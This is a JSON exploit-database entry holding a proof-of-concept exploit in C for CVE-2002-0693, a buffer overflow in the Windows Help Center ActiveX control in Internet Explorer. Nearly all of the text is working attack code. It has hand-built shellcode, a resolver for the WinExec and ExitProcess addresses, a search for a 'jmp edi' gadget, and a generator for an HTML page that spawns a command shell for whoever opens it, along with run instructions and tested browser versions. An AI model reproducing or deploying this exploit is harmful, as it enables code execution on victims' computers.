"exploit", "cvelist": ["CVE-2002-0693"], "modified": "2002-10-07T00:00:00", "id": "EDB-ID:21902", "href": "https://www.exploit-db.com/exploits/21902/", "sourceData": "source: http://www.securityfocus.com/bid/5874/info\r\n\r\nThe ActiveX control that provides much of the functionality for the Windows Help Center contains an unchecked buffer. Successful exploitation could result in execution of arbitrary code in the security context of the current user.\r\n\r\n/*\r\nBy ipxodi@whitecell.org 10.07.2002\r\n\r\nprove of concept code of Windows Help buffer overflow.\r\nBug discovered by \r\nFor tech detail see \"Thor Larholm security advisory TL#004\".\r\nTo Use:\r\ncl ex.c\r\nRun as:\r\nex > ex.htm\r\nstart ex.htm (be sure to set iexplore as your default htm viewer.)\r\nYou will get a cmd shell.\r\n\r\nTested on IE 5.5, IE5.5 SP2, IE 6.0.\r\nother version untested.\r\n*/\r\n\r\n#include <windows.h>\r\n#include <stdio.h>\r\n\r\n\r\nchar shellcode[] = \"\\x55\\x8B\\xEC\\x33\\xFF\\x57\\xC6\\x45\\xFC\\x63\\xC6\\x45\\xFD\\x6D\\xC6\\x45\\xFE\\x64\\x57\\xC6\\x45\\xF8\\x03\" \"\\x80\\x6D\\xF8\\x50\" \r\n\t\t\"\\x8D\\x45\\xFC\\x50\\x90\\xB8\" \"EXEC\" \"\\xFF\\xD0\\x33\\xC0\\x50\\x90\\xB8\" \"EXIT\" \"\\xFF\\xD0\\xC3\";\r\n\r\nchar shellcode_encode[] = \"\\x55\\x8B\\xEC\\x33\\xFF\\x57\\xC6\\x45\\xFC\\x63\\xC6\\x45\\xFD\\x6D\\xC6\\x45\\xFE\\x64\\x57\\xC6\\x45\\xF8\\x53\" \"\\x80\\x6D\\xF8\\x50\" \r\n\t\t\"\\x8D\\x45\\xFC\\x50\\x90\\xB8\" \"EXEC\" \"\\x2C\\x78\" \"\\xFF\\xD0\" \"\\x41\\x33\\xC0\\x50\\x90\\xB8\"\"EXIT\" \"\\x2C\\x78\" \"\\xFF\\xD0\\xC3\";\r\n\r\nvoid EncodeFuncAddr(char * shellcode,DWORD addr,char * pattern)\r\n{\r\n\tunsigned char * p ;\r\n\tp = strstr(shellcode,pattern);\r\n\tif(p)\t{\r\n\t\tif( *(p+4) == '\\xFF' )\t\r\n\t\t\tmemcpy(p,&addr,4);\r\n\t\telse {\r\n\t\t\tif((addr & 0xFF) > 0x80)\t{\r\n\t\t\t\tmemcpy(p,&addr,4);\t\r\n\t\t\t\t*(p+4) = 0x90;\r\n\t\t\t\t*(p+5) = 0x90;\r\n\t\t\t}else\t{\r\n\t\t\t\taddr += 0x78;\r\n\t\t\t\tmemcpy(p,&addr,4);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\n\r\nint ModifyFuncAddr(char * shellcode)\r\n{\r\n\tchar * temp=\"0123456789ABCDEF\";\r\n\tHMODULE hdl;\r\n\tunsigned char * p ;\r\n\tDWORD pAddr_WinExec ,pAddr_Exit ;\r\n\r\n\thdl = LoadLibrary(\"kernel32.dll\");\r\n\tpAddr_WinExec = GetProcAddress(hdl,\"WinExec\");\r\n\tpAddr_Exit = GetProcAddress(hdl,\"ExitProcess\"); \r\n\tfprintf(stderr,\"Find WinExec at Address %x, ExitProcess at Address %x\\n\",pAddr_WinExec,pAddr_Exit);\r\n\tEncodeFuncAddr(shellcode,pAddr_WinExec,\"EXEC\");\r\n\tEncodeFuncAddr(shellcode,pAddr_Exit,\"EXIT\");\r\n}\r\n\r\n\r\nvoid Validate(char * shellcode)\r\n{\r\n\tunsigned char *p, *foo = \"\\\\\\/:*?\\\"<>|\";\r\n\tfor(;*foo;foo++)\t{\r\n\t\tp = strchr(shellcode,*foo);\r\n\t\tif(p)\t{\r\n\t\t\tfprintf(stderr,\"ERROR:ShellCode Contains Invalid Char For File name: %s\\n\",p);\r\n\t\t}\r\n\t}\r\n}\r\n\r\n#define Valid(c)\t(c>0x30)\r\nint FindCode(char * code)\r\n{\r\n\tDWORD addr;\r\n\tunsigned char * p = (unsigned char * )LoadLibrary(\"kernel32.dll\");\r\n\r\n\tfor(;p < 0x77f00000;p++)\r\n\t\tif(memcmp(p,code,2)==0)\t{\r\n\t\t\tfprintf(stderr,\"Find Code at Address %x\\n\",p);\r\n\t\t\taddr = (DWORD) p;\r\n\t\t\tif( (addr &0xFF )>0x30 && ((addr>>8)&0xFF)>0x30&& ((addr>>16)&0xFF)>0x30 && ((addr>>24)&0xFF)>0x30 )\r\n\t\t\t\treturn p;\r\n\t\t}\r\n\treturn 0;\r\n}\r\nint main(int argc, char ** argv)\r\n{\r\n\tchar * prefix = \"<script type=\\\"text/javascript\\\">showHelp(\\\"\";\r\n\tchar *postfix = \"\\\");</script>\";\r\n\tchar buff[1024];\r\n\tint mode = 2;\r\n\tchar * pCode = buff, *shell;\r\n\tDWORD addr;\r\n\tint offset = 784;\r\n\t\r\n\tif(argc > 3 )\t{\r\n\t\tprintf(\"Usage: %s [mode] [offset]\",argv[0]);\r\n\t\tprintf(\"Normal: %s 1 784\",argv[0]);\r\n\t\tprintf(\"Advanc: %s 2 784\",argv[0]);\r\n\t\texit(0);\r\n\t}else if(argc == 3 )\t{\r\n\t\toffset = atoi(argv[2]);\r\n\t\tmode = atoi(argv[1]);\r\n\t};\r\n\tfprintf(stderr,\"Mode %d, Using Offset %d\\n\",mode,offset);\r\n\tmemset(buff,0x41,1023);\r\n\t\r\n\tmemcpy(pCode, \"A:\\\\\\xC0\",4);\t//cmp al,al as a nop.\r\n\t\r\n\tswitch(mode)\t{\r\n\t\tcase 1: shell = shellcode; break;\r\n\t\tcase 2: shell = shellcode_encode;break;\r\n\t\tcase 3: {\r\n\t\t\t\tsprintf(buff +offset, \"abcd\");\r\n\t\t\t\tprintf(\"%s%s%s\",prefix,buff,postfix);\r\n\t\t\t\treturn ;\r\n\t\t\t\t}\r\n\t}\r\n\tModifyFuncAddr(shell);\r\n\tValidate(shell);\r\n\tmemcpy(pCode+0x10,shell,strlen(shell));\r\n\tpCode = buff + offset;\r\n\taddr = FindCode(\"\\xFF\\xE7\");\t// jmp edi\r\n\t*(int*)pCode = addr ? addr : 0x77e79d02;\r\n\t*(pCode+4)=0;\r\n\tprintf(\"%s%s%s\",prefix,buff,postfix);\r\n}\r\n\t\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21902/"}]}